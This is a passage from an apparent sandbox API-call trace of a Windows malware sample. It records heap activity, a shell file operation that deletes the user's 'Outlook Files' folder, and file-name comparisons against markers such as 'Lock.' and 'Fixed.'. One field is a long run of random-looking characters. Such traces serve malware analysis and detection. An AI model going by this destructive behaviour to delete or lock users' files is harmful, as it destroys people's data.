| out: hHeap=0x2af0000) returned 1 [0219.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0219.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0219.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0219.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854a10 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0219.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0219.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eaea0 [0219.697] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Outlook Files", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpFilePart=0x8cf650*="Outlook Files") returned 0x27 [0219.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaea0 | out: hHeap=0x2af0000) returned 1 [0219.697] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files")) returned 0x10 [0219.697] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\Outlook Files", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\Outlook Files", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0219.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854a10 | out: hHeap=0x2af0000) returned 1 [0219.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0219.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0219.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0219.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0219.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.954] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0219.954] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.954] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0219.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0219.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0219.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0219.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0219.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0219.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0219.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0219.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0219.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0219.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0219.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oXBXXG.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBXXG.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BXXG.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0219.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XXG.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XG.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0219.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0219.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0219.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0219.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0219.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0219.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0219.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0219.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0219.955] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0219.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0219.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0219.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0219.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oXBXXG.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBXXG.xlsx", cchCount1=6, lpString2="Fixed.", 